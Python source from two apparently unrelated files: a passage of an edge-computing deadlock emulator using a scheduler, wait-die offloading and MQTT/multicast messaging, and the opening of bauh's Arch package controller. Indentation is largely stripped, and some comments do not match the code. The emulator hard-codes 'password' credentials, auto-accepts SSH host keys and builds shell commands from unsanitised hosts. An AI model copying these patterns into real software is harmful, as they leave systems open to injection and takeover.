cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
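# For example, a UTC timestamp of 2021-01-15 10:30:45.123456 yields
# ['2021', '01', '15', '10', '30', '45', '123456']. Note that str() drops the fractional
# part when microsecond == 0, in which case g[1] would raise IndexError.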
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
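# Worked example: for the default _tasks periods above, lcm([20, 5, 10, 10, 15]) == 60,
# the hyperperiod that load_tasks() uses as the schedule length.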
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
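# Example (illustration only): with seq = ['t1', 't2'] and
# process = {'t1': {'wcet': 2}, 't2': {'wcet': 1}}, the round-robin expansion above
# yields ['t1', 't2', 't1'], one entry per executed time unit.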
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
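    # Sketch of the approach implemented below: over one hyperperiod (_lcm_) the queued task
    # with the earliest absolute deadline is run at each time unit, a task preempted before it
    # completes is marked with '*' in the trace, and the non-idle execution order is finally
    # expanded into per-time-unit entries by task_time_map().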
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence with wait_die
def wait_die(processes, avail, n_need, allocat):
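    # Wait-die style deadlock avoidance (summary of the rules coded below): a process whose
    # need fits the available vector executes and releases its allocation; otherwise it is
    # compared by list position (a proxy for age) with the largest current holder, an older
    # requester waits ('w'), and a younger or already-waiting one is offloaded rather than aborted.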
global deadlock
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
    while 'w' in work or 0 in work:
if 0 in work:
ind = work.index(0)
i = processes[ind]
elif 'w' in work:
# print('wk: ', work)
ind = work.index('w')
i = processes[ind]
else:
break
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
# print('added: ', exec_seq)
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', n_need[_max])
if processes.index(_max) > processes.index(i): # if true, i is older
# if process is already waiting then offload process
if work[ind] == 'w':
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
# print('offload reentry: ', i, offload)
else:
# wait put process to waiting
work[processes.index(i)] = 'w'
# print('waiting: ', i)
else:
# abort i
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
# print('offload: ', i)
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(p)]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wait_die(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
    # waiting time estimate = total waiting time / 2; using the plain average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
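# Worked example (illustration only): with two recorded samples and a last average of 4.0,
# a new sample a1 = 6.0 gives ((3 - 1) * 4.0 + 6.0) / 3 = 4.6667, matching the cumulative
# average formula noted above.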
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
                                             address[0]))  # calculate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
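    # Offloading policy implemented below: with no MEC wait-time data yet, a task goes straight
    # to the cloud; otherwise it goes to the least-loaded MEC when its resource need fits and
    # either that MEC's wait time beats the task's latency bound or its RTT beats the cloud RTT;
    # in every other case the task falls back to the cloud.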
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
                offload_check[1] += len(o[0])  # number of tasks being re-offloaded
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+wait-die {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
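# Example (illustration only): mec_id('192.168.1.5') -> '005', mec_id('192.168.1.45') -> '045'.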
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_10_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_10_{mec_no} = {mec_rtt} \ncpu{_id_}_10_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_10_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_10_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_10_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_10_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_10_{mec_no} = {deadlock} \nmemory{_id_}_10_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_10_{mec_no} = {cooperate} \ntask_record{_id_}_10_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_10_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_10_{mec_no} = {offload_check}"
list_result = [
f"\nwt{_id_}_10_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_10_{mec_no} = {mec_rtt} \ncpu{_id_}_10_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_10_{mec_no} = {_off_mec} \noff_cloud{_id_}_10_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_10_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_10_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_10_{mec_no} = {deadlock} \nmemory{_id_}_10_{mec_no} = {memory}",
f"\ntask_received{_id_}_10_{mec_no} = {total_received_task} \nsent_t{_id_}_10_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_10_{mec_no} = {cooperate} \ntask_record{_id_}_10_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_10_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_10_{mec_no} = {offload_check}",
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_10_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_10_{mec_no}datap.py"
os.system(cmd)
else:
os.system('mkdir -p data/raw')
cmd = f"echo '' > {path_}{_id_}_10_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_10_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_10_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_10_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_10_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1   # main-loop flag; set to 0 when the broker sends the 'stop' message
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
                print('RMS List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.5)
except KeyboardInterrupt:
print('\nProgramme Terminated')
            stop = True  # signal the helper threads to exit
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
break
print('algo stopped!')
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 30))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
    parser.add_argument('--mec_no', type=int, default=1, help='Number of MEC nodes')
parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
controller.py
|
import json
import os
import re
import shutil
import subprocess
import time
from pathlib import Path
from threading import Thread
from typing import List, Set, Type
import requests
from bauh.api.abstract.controller import SearchResult, SoftwareManager, ApplicationContext
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher
from bauh.api.abstract.model import PackageUpdate, PackageHistory, SoftwarePackage, PackageSuggestion, PackageStatus
from bauh.api.abstract.view import MessageType
from bauh.commons.category import CategoriesDownloader
from bauh.commons.html import bold
from bauh.commons.system import SystemProcess, ProcessHandler, new_subprocess, run_cmd, new_root_subprocess, \
SimpleProcess
from bauh.gems.arch import BUILD_DIR, aur, pacman, makepkg, pkgbuild, message, confirmation, disk, git, suggestions, \
gpg, URL_CATEGORIES_FILE, CATEGORIES_CACHE_DIR, CATEGORIES_FILE_PATH
from bauh.gems.arch.aur import AURClient
from bauh.gems.arch.mapper import ArchDataMapper
from bauh.gems.arch.model import ArchPackage
from bauh.gems.arch.worker import AURIndexUpdater, ArchDiskCacheUpdater, ArchCompilationOptimizer
URL_GIT = 'https://aur.archlinux.org/{}.git'
URL_PKG_DOWNLOAD = 'https://aur.archlinux.org/cgit/aur.git/snapshot/{}.tar.gz'
URL_SRC_INFO = 'https://aur.archlinux.org/cgit/aur.git/plain/.SRCINFO?h='
RE_SPLIT_VERSION = re.compile(r'(=|>|<)')
SOURCE_FIELDS = ('source', 'source_x86_64')
RE_PRE_DOWNLOADABLE_FILES = re.compile(r'(https?|ftp)://.+\.\w+[^gpg|git]$')
SEARCH_OPTIMIZED_MAP = {
'google chrome': 'google-chrome',
'chrome google': 'google-chrome',
'googlechrome': 'google-chrome'
}
class ArchManager(SoftwareManager):
def __init__(self, context: ApplicationContext):
super(ArchManager, self).__init__(context=context)
self.aur_cache = context.cache_factory.new()
# context.disk_loader_factory.map(ArchPackage, self.aur_cache) TODO
self.mapper = ArchDataMapper(http_client=context.http_client)
self.i18n = context.i18n
self.aur_client = AURClient(context.http_client)
self.names_index = {}
self.aur_index_updater = AURIndexUpdater(context, self)
self.dcache_updater = ArchDiskCacheUpdater(context.logger, context.disk_cache)
self.comp_optimizer = ArchCompilationOptimizer(context.logger)
self.logger = context.logger
self.enabled = True
self.arch_distro = context.distro == 'arch'
self.categories_mapper = CategoriesDownloader('AUR', context.http_client, context.logger, self, self.context.disk_cache,
URL_CATEGORIES_FILE, CATEGORIES_CACHE_DIR, CATEGORIES_FILE_PATH)
self.categories = {}
def _upgrade_search_result(self, apidata: dict, installed_pkgs: dict, downgrade_enabled: bool, res: SearchResult, disk_loader: DiskCacheLoader):
app = self.mapper.map_api_data(apidata, installed_pkgs['not_signed'], self.categories)
app.downgrade_enabled = downgrade_enabled
if app.installed:
res.installed.append(app)
if disk_loader:
disk_loader.fill(app)
else:
res.new.append(app)
Thread(target=self.mapper.fill_package_build, args=(app,), daemon=True).start()
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1) -> SearchResult:
self.comp_optimizer.join()
downgrade_enabled = git.is_enabled()
res = SearchResult([], [], 0)
installed = {}
read_installed = Thread(target=lambda: installed.update(pacman.list_and_map_installed()), daemon=True)
read_installed.start()
mapped_words = SEARCH_OPTIMIZED_MAP.get(words)
api_res = self.aur_client.search(mapped_words if mapped_words else words)
if api_res and api_res.get('results'):
read_installed.join()
for pkgdata in api_res['results']:
self._upgrade_search_result(pkgdata, installed, downgrade_enabled, res, disk_loader)
else: # if there are no results from the API (it could be because there were too many), tries the names index:
if self.names_index:
to_query = set()
for norm_name, real_name in self.names_index.items():
if words in norm_name:
to_query.add(real_name)
if len(to_query) == 25:
break
pkgsinfo = self.aur_client.get_info(to_query)
if pkgsinfo:
read_installed.join()
for pkgdata in pkgsinfo:
                        self._upgrade_search_result(pkgdata, installed, downgrade_enabled, res, disk_loader)
res.total = len(res.installed) + len(res.new)
return res
def _fill_aur_pkgs(self, not_signed: dict, pkgs: list, disk_loader: DiskCacheLoader, internet_available: bool):
downgrade_enabled = git.is_enabled()
if internet_available:
try:
pkgsinfo = self.aur_client.get_info(not_signed.keys())
if pkgsinfo:
for pkgdata in pkgsinfo:
pkg = self.mapper.map_api_data(pkgdata, not_signed, self.categories)
pkg.downgrade_enabled = downgrade_enabled
if disk_loader:
disk_loader.fill(pkg)
pkg.status = PackageStatus.READY
pkgs.append(pkg)
return
except requests.exceptions.ConnectionError:
self.logger.warning('Could not retrieve installed AUR packages API data. It seems the internet connection is off.')
self.logger.info("Reading only local AUR packages data")
for name, data in not_signed.items():
pkg = ArchPackage(name=name, version=data.get('version'),
latest_version=data.get('version'), description=data.get('description'),
installed=True, mirror='aur')
pkg.categories = self.categories.get(pkg.name)
pkg.downgrade_enabled = downgrade_enabled
if disk_loader:
disk_loader.fill(pkg)
pkg.status = PackageStatus.READY
pkgs.append(pkg)
def _fill_mirror_pkgs(self, mirrors: dict, apps: list):
# TODO
for name, data in mirrors.items():
app = ArchPackage(name=name, version=data.get('version'), latest_version=data.get('version'), description=data.get('description'))
app.installed = True
app.mirror = '' # TODO
app.update = False # TODO
apps.append(app)
def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
installed = pacman.list_and_map_installed()
apps = []
if installed and installed['not_signed']:
self.dcache_updater.join()
self.categories_mapper.join()
self._fill_aur_pkgs(installed['not_signed'], apps, disk_loader, internet_available)
return SearchResult(apps, None, len(apps))
def downgrade(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
handler = ProcessHandler(watcher)
app_build_dir = '{}/build_{}'.format(BUILD_DIR, int(time.time()))
watcher.change_progress(5)
try:
if not os.path.exists(app_build_dir):
build_dir = handler.handle(SystemProcess(new_subprocess(['mkdir', '-p', app_build_dir])))
if build_dir:
watcher.change_progress(10)
watcher.change_substatus(self.i18n['arch.clone'].format(bold(pkg.name)))
clone = handler.handle(SystemProcess(subproc=new_subprocess(['git', 'clone', URL_GIT.format(pkg.name)], cwd=app_build_dir), check_error_output=False))
watcher.change_progress(30)
if clone:
watcher.change_substatus(self.i18n['arch.downgrade.reading_commits'])
clone_path = '{}/{}'.format(app_build_dir, pkg.name)
pkgbuild_path = '{}/PKGBUILD'.format(clone_path)
commits = run_cmd("git log", cwd=clone_path)
watcher.change_progress(40)
if commits:
commit_list = re.findall(r'commit (.+)\n', commits)
if commit_list:
if len(commit_list) > 1:
for idx in range(1, len(commit_list)):
commit = commit_list[idx]
with open(pkgbuild_path) as f:
